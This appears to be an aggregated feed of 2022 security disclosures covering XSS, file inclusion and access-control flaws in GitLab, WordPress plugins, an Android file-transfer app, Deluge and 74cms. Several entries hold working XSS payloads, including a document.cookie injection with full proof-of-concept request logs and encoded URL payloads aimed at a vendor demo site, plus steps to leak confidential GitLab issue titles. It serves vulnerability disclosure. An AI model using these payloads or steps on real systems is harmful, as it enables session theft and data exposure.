Chamilo 1.11.16 is affected by an authenticated local file inclusion vulnerability which allows authenticated users with access to 'big file uploads' to copy/move files from anywhere in the file system into the web directory.

CVE-2022-42029: Security issues - Chamilo LMS

An improper access control issue in GitLab CE/EE affecting all versions starting from 15.2 before 15.2.4, all versions from 15.3 before 15.3.2 allows disclosure of confidential information via the Incident timeline events.

**HackerOne report #1652853** by yvvdwf on 2022-07-28, assigned to @ngeorge1:

Report | Attachments | How To Reproduce

**Report**

Hi,

Gitlab recently introduced Incident Timeline events feature. The events' description is generated using TimelineEventPipeline pipeline which allows the following filters:

    def self.filters  
      [@]filters ||= FilterArray[  
        *super,  
        Filter::SanitizationFilter,  
        *Banzai::Pipeline::GfmPipeline.reference_filters,  
        Filter::EmojiFilter,  
        Filter::ExternalLinkFilter,  
        Filter::ImageLinkFilter  
      ]  
    end  

The reference_filters filters expand any references. Consequently when the description of a timeline event references to _private or confidential resources_, it will render their titles.

Normally these private/confidential resources are redacted when rendering to non-permission users. Somehow this redaction is not used in the incident timeline event.

**Steps to reproduce:**

As a normal user (victim):

*   create a private project, let's call victim/project-a, then create a confidential issue inside. It's GFM reference is now victim/project-a#1

As an attacker:

*   In an existing project or create a new one
*   Go to Monitor/Incidents and create an incident
*   Open Timeline tab of the incident you've created. Then create a new timeline event and reference the issue above: fill victim/project-a#1 in the Timeline text
*   You should see now the issue's title is rendered in the description of the event

**Example**

I tested on gitlab.com. I used gitlab-org/gitlab#367408 as payload which is used to track one my previous H1 report.  
The example is available in this private project: https://gitlab.com/yvvdwf/xss/-/issues/12

**Impact**

This vulnerability allows to renders _all_ GFM references, such as, merged requests, issues, etc, even if they are private or confidential.

For example, attackers can simply scan through all _issue_ numbers (starting from 1) of the gitlab-org/gitlab project, and thus leaking their titles.

Best regards,  
yvvdwf

**Impact**

This vulnerability allows attacker to access to _all private or confidential_ GFM references, such as, merged requests, issues, etc.

For example, attackers can simply scan through all _issue_ numbers (starting from 1) of the gitlab-org/gitlab project, and thus leaking their titles.

**Attachments**

**Warning:** Attachments received through HackerOne, please exercise caution!

*   Screenshot\_2022-07-28\_at\_15.20.03.png

**How To Reproduce**

Please add reproducibility information to this section:

CVE-2022-2630: Arbitrary GFM references rendered in Incident Timeline Events leak private/confidential resources (#369429) · Issues · GitLab.org / GitLab · GitLab

A cross-site scripting issue has been discovered in GitLab CE/EE affecting all versions before 15.1.6, 15.2 to 15.2.4 and 15.3 prior to 15.3.2. It was possible to exploit a vulnerability in setting the labels colour feature which could lead to a stored XSS that allowed attackers to perform arbitrary actions on behalf of victims at client side.

🤖 GitLab Bot 🤖 authored Oct 17, 2022

CVE-2022-2865: 2022/CVE-2022-2865.json · master · GitLab.org / cves · GitLab

WordPress Photo Gallery plugin version 1.8.0 suffers from a cross site scripting vulnerability.

    ┌┌───────────────────────────────────────────────────────────────────────────────────────┐││                                     C r a C k E r                                    ┌┘┌┘                 T H E   C R A C K   O F   E T E R N A L   M I G H T                  ││└───────────────────────────────────────────────────────────────────────────────────────┘┘ ┌────              From The Ashes and Dust Rises An Unimaginable crack....          ────┐┌┌───────────────────────────────────────────────────────────────────────────────────────┐┌┘                                      [ Exploits ]                                    ┌┘└───────────────────────────────────────────────────────────────────────────────────────┘┘:  Author   : CraCkEr                                                                    :│  Website  : wordpress.org/plugins/                                                     ││  Vendor   : Photo Gallery Team - wpsofts.com                                           ││  Software : WordPress Photo Gallery 1.8.0                                              ││  Vuln Type: Reflected XSS                                                              ││  Method   : GET                                                                        ││  Impact   : Manipulate the content of the site                                         ││                                                                                        ││────────────────────────────────────────────────────────────────────────────────────────││                                                                                       ┌┘└───────────────────────────────────────────────────────────────────────────────────────┘┘:                                                                                        :│  Release Notes:                                                                        ││  ═════════════                                                                         ││  The attacker can send to victim a link containing a malicious URL in an email or      ││  instant message can perform a wide variety of actions, such as stealing the victim's  ││  session token or login credentials                                                    ││                                                                                        │┌┌───────────────────────────────────────────────────────────────────────────────────────┐┌┘                                                                                      ┌┘└───────────────────────────────────────────────────────────────────────────────────────┘┘Greets:    The_PitBull, Raz0r, iNs, SadsouL, His0k4, Hussin X, Mr. SQL            CryptoJob (Twitter) twitter.com/CryptozJob     ┌┌───────────────────────────────────────────────────────────────────────────────────────┐┌┘                                    © CraCkEr 2022                                    ┌┘└───────────────────────────────────────────────────────────────────────────────────────┘┘URL parameter 'pg' is vulnerable to XSSPath: /photo-gallery/https://wpsofts.com/grid-kit-demo/photo-gallery/?pid=47&pg=2&zdifv%2527%253e%253cscript%253ealert%25281%2529%253c%252fscript%253eh18n1=1URL parameter 'pid' is vulnerable to XSSPath: /photo-gallery/https://wpsofts.com/grid-kit-demo/photo-gallery/?pida2sg4%27%2dalert%281%29%2d%27z632u&pg=2[-] Done

WordPress Photo Gallery 1.8.0 Cross Site Scripting

WiFi File Transfer version 1.0.8 suffers from a cross site scripting vulnerability.

Document Title:  
===============  
WiFi File Transfer v1.0.8 - Cross Site Scripting Vulnerabilities

References (Source):  
====================  
https://www.vulnerability-lab.com/get_content.php?id=2322

Release Date:  
=============  
2022-10-17

Vulnerability Laboratory ID (VL-ID):  
====================================  
2322

Common Vulnerability Scoring System:  
====================================  
5.6

Vulnerability Class:  
====================  
Cross Site Scripting - Persistent

Current Estimated Price:  
========================  
500€ - 1.000€

Product & Service Introduction:  
===============================  
WiFi File Transfer lets you transfer files to/from your phone or tablet via WiFi. Easy to use web interface, no USB cable required.

(Copy of the Homepage:https://play.google.com/store/apps/details?id=com.smarterdroid.wififiletransfer&hl=de&gl=US  )

Abstract Advisory Information:  
==============================  
The vulnerability laboratory core research team discovered a multiple persistent cross site vulnerabilities in the WiFi File Transfer v1.0.8 mobile android web-application.

Affected Product(s):  
====================  
smarterDroid  
Product: WiFi File Transfer v1.0.8 - Android (Wifi) (Web-Application)

Vulnerability Disclosure Timeline:  
==================================  
2022-10-17: Public Disclosure (Vulnerability Laboratory)

Discovery Status:  
=================  
Published

Exploitation Technique:  
=======================  
Remote

Severity Level:  
===============  
Medium

Authentication Type:  
====================  
Open Authentication (Anonymous Privileges)

User Interaction:  
=================  
Low User Interaction

Disclosure Type:  
================  
Independent Security Research

Technical Details & Description:  
================================  
A persistent input validation web vulnerability has been discovered in the WiFi File Transfer v1.0.8 mobile web-application for android.  
The vulnerability allows remote attackers to inject own malicious script codes with persistent attack vector to compromise browser to web-application  
requests from the application-side.

The vulnerabilities are located in the data_file parameter of the add a file or folder and create a zip file function.  
Attackers with wifi access are able to anonymous use the webui and can inject own malicious script code with persistent  
attack vector via post method request.

Successful exploitation of the vulnerability results in session hijacking, persistent phishing attacks, persistent external  
redirects to malicious source and persistent manipulation of affected application modules.

Proof of Concept (PoC):  
=======================  
The persistent post inject web vulnerabilities can be exploited by remote attackers in the same wifi network with anonymous privileges and low user interaction.  
For security demonstration or to reproduce the web security vulnerability in the application follow the provided information and steps below to continue.

Manual reproduce of the vulnerability ...  
1. Install the mobile android application and start it  
2. Start the wifi web-server  
3. Login as attacker by the browser over the network  
4. Inject payload as folder name, file name or zip file and save via post method request  
5. The payload executes in the web ui when previewing the paths

Exploitation: Payload  
<a onmouseover=alert(document.cookie)>picture1337.jpg</a>

--- PoC Session Logs #1 (POST) [Add] [Create] [Folder] [data_file] ---  
http://localhost:1234/storage/emulated/0/DCIM/  
Host: localhost:1234  
Accept-Encoding: gzip, deflate  
Content-Type: multipart/form-data; boundary=---------------------------321836412920954805143620932676  
Content-Length: 613  
Origin:http://localhost:1234  
Connection: keep-alive  
Referer:http://localhost:1234/storage/emulated/0/DCIM/  
action=mkdir&data_file=New"><a onmouseover=alert(document.cookie)>picture1337.jpg</a>&data_currentParams=?&data_filepath=/storage/emulated/0/DCIM/  
-  
POST: HTTP/1.1 302 OK  
Connection: Close  
Content-Type: text/html  
Location:http://localhost:1234/storage/emulated/0/DCIM/  
Content-Length: 143  
-  
http://localhost:1234/storage/emulated/0/DCIM/  
Host: localhost:1234  
Accept-Encoding: gzip, deflate  
Referer:http://localhost:1234/storage/emulated/0/DCIM/  
Connection: keep-alive  
-  
POST: HTTP/1.1 200 OK  
Connection: Close  
Content-Type: text/html

--- PoC Session Logs #2 (POST) [Add] [Create] [Zip] [data_file] ---  
http://localhost:1234/storage/emulated/0/Pictures/?  
Host: localhost:1234  
Accept-Encoding: gzip, deflate  
Content-Type: multipart/form-data; boundary=---------------------------289297208414223233314228108045  
Content-Length: 882  
Origin:http://localhost:1234  
Connection: keep-alive  
Referer:http://localhost:1234/storage/emulated/0/Pictures/?  
Upgrade-Insecure-Requests: 1  
action=multizip&data_file=.<a onmouseover=alert(document.cookie)>File.Zip</a>.Zip&data_currentParams=?&data_filepath=/storage/emulated/0/Pictures/&1.jpg=file&2.jpg=file  
-  
POST: HTTP/1.1 200 OK  
Connection: Close  
Content-Type: text/html  
Location:http://localhost:1234/storage/emulated/0/Pictures/  
Content-Length: 151  
-  
http://localhost:1234/storage/emulated/0/Pictures/  
Host: localhost:1234  
Accept-Encoding: gzip, deflate  
Referer:http://localhost:1234/storage/emulated/0/Pictures/?  
Connection: keep-alive  
Upgrade-Insecure-Requests: 1  
-  
POST: HTTP/1.1 200 OK  
Connection: Close  
Content-Type: text/html

Reference(s):  
http://localhost:1234/  
http://localhost:1234/storage/  
http://localhost:1234/storage/emulated/  
http://localhost:1234/storage/emulated/0/  
http://localhost:1234/storage/emulated/0/DCIM/  
http://localhost:1234/storage/emulated/0/Pictures/

Solution - Fix & Patch:  
=======================  
The persistent web vulnerabilities can be resolved by the following steps ...  
1. Restrict the input of the folder, filename and zip files to disallow special chars for add or create process  
2. Encode and escape the content of the data_file parameter to sanitize the content  
3. Sanitize and filter the output locations of the explorer path listings to prevent further attacks

Security Risk:  
==============  
The security risk of the persistent web vulnerabilities in the mobile android wifi web-application are estimated as medium.

Credits & Authors:  
==================  
Vulnerability-Lab [Research Team] -https://www.vulnerability-lab.com/show.php?user=Vulnerability-Lab

Disclaimer & Information:  
=========================  
The information provided in this advisory is provided as it is without any warranty. Vulnerability Lab disclaims all warranties,  
either expressed or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability-Lab  
or its suppliers are not liable in any case of damage, including direct, indirect, incidental, consequential loss of business profits  
or special damages, even if Vulnerability-Lab or its suppliers have been advised of the possibility of such damages. Some states do  
not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation may not apply.  
We do not approve or encourage anybody to break any licenses, policies, deface websites, hack into databases or trade with stolen data.

Domains:   https://www.vulnerability-lab.com  ;  https://www.vuln-lab.com  ;https://www.vulnerability-db.com

Any modified copy or reproduction, including partially usages, of this file requires authorization from Vulnerability Laboratory.  
Permission to electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other  
media, are reserved by Vulnerability-Lab Research Team or its suppliers. All pictures, texts, advisories, source code, videos and other  
information on this website is trademark of vulnerability-lab team & the specific authors or managers. To record, list, modify, use or  
edit our material contact (admin@ or research@) to get a ask permission.

            Copyright © 2022 | Vulnerability Laboratory - [Evolution Security GmbH]™

--   
VULNERABILITY LABORATORY (VULNERABILITY LAB)  
RESEARCH, BUG BOUNTY & RESPONSIBLE DISCLOSURE

WiFi File Transfer 1.0.8 Cross Site Scripting

Gentoo Linux Security Advisory 202210-7 - A vulnerability has been found in Deluge which could result in XSS. Versions less than 2.1.1 are affected.

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -  
Gentoo Linux Security Advisory                           GLSA 202210-07  
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -  
                                           https://security.gentoo.org/  
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

 Severity: Low  
    Title: Deluge: Cross-Site Scripting  
     Date: October 16, 2022  
     Bugs: #866842  
       ID: 202210-07

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

Synopsis  
========

A vulnerability has been found in Deluge which could result in XSS.

Background  
==========

Deluge is a BitTorrent client.

Affected packages  
=================

    -------------------------------------------------------------------  
     Package              /     Vulnerable     /            Unaffected  
    -------------------------------------------------------------------  
  1  net-p2p/deluge             < 2.1.1                      >= 2.1.1

Description  
===========

Deluge does not sufficiently sanitize crafted torrent file data, leading  
to the application interpreting untrusted data as HTML.

Impact  
======

An attacker can achieve XSS via a crafted torrent file.

Workaround  
==========

There is no known workaround at this time.

Resolution  
==========

All Deluge users should upgrade to the latest version:

  # emerge --sync  
  # emerge --ask --oneshot --verbose ">=net-p2p/deluge-2.1.1"

References  
==========

[ 1 ] CVE-2021-3427  
      https://nvd.nist.gov/vuln/detail/CVE-2021-3427

Availability  
============

This GLSA and any updates to it are available for viewing at  
the Gentoo Security Website:

 https://security.gentoo.org/glsa/202210-07

Concerns?  
=========

Security is a primary focus of Gentoo Linux and ensuring the  
confidentiality and security of our users' machines is of utmost  
importance to us. Any security concerns should be addressed to  
security@gentoo.org or alternatively, you may file a bug at  
https://bugs.gentoo.org.

License  
=======

Copyright 2022 Gentoo Foundation, Inc; referenced text  
belongs to its owner(s).

The contents of this document are licensed under the  
Creative Commons - Attribution / Share Alike license.

https://creativecommons.org/licenses/by-sa/2.5

Gentoo Linux Security Advisory 202210-07

74cmsSE v3.12.0 was discovered to contain a cross-site scripting (XSS) vulnerability via the component /apiadmin/notice/add. This vulnerability allows attackers to execute arbitrary web scripts or HTML via a crafted payload injected into the Title field.

Vulnerability Name: Storage cross site scripting vulnerability(XSS)

Date of Discovery: 23/9/2022

Product version： 74cmsSEv3.12.0 DownloadLink : https://www.74cms.com/download/detail/89.html

Author: xxhzz

Vulnerability Description:  
Add a bulletin to the background of 74cmSSE V3.12.0. Insert the XSS Payload into the header to store and trigger the XSS

Prove:  
1.In the background of the website, add a bulletin and insert payload in the header  
payload: {{$on.constructor('alert(1)')()}}  
  
  
2.Check the parameter and find title  
  
3.Save success  
  
4.Click the title to trigger the XSS successfully  

code:  
Position: \\74cmsSEv3.12.0\\upload\\application\\apiadmin\\controller\\Notice.php  
  
Check the xss parameter filtering mechanism and escape only the angle brackets  
  
I am using AngularJS sandbox escapes reflected.Therefore, the storage xss vulnerability was successfully triggered.

CVE-2022-41472: 74cmsSE Storage cross site scripting vulnerability(XSS) · Issue #1 · xxhzz1/74cmsSE-Storage-cross-site-scripting-vulnerability

The Tutor LMS WordPress plugin before 2.0.10 does not escape some course parameters, which could allow high privilege users such as admin to perform Stored Cross-Site Scripting attacks even when the unfiltered_html capability is disallowed (for example in multisite setup)

CVE-2022-2563

The Meks Easy Social Share WordPress plugin before 1.2.8 does not sanitise and escape some of its settings, which could allow high privilege users such as admin to perform Stored Cross-Site Scripting attacks even when the unfiltered_html capability is disallowed (for example in multisite setup)

CVE-2022-2574

The WP Custom Cursors WordPress plugin before 3.0.1 does not have CSRF check in place when creating and editing cursors, which could allow attackers to made a logged in admin perform such actions via CSRF attacks. Furthermore, due to the lack of sanitisation and escaping in some of the cursor options, it could also lead to Stored Cross-Site Scripting

Tag

#xss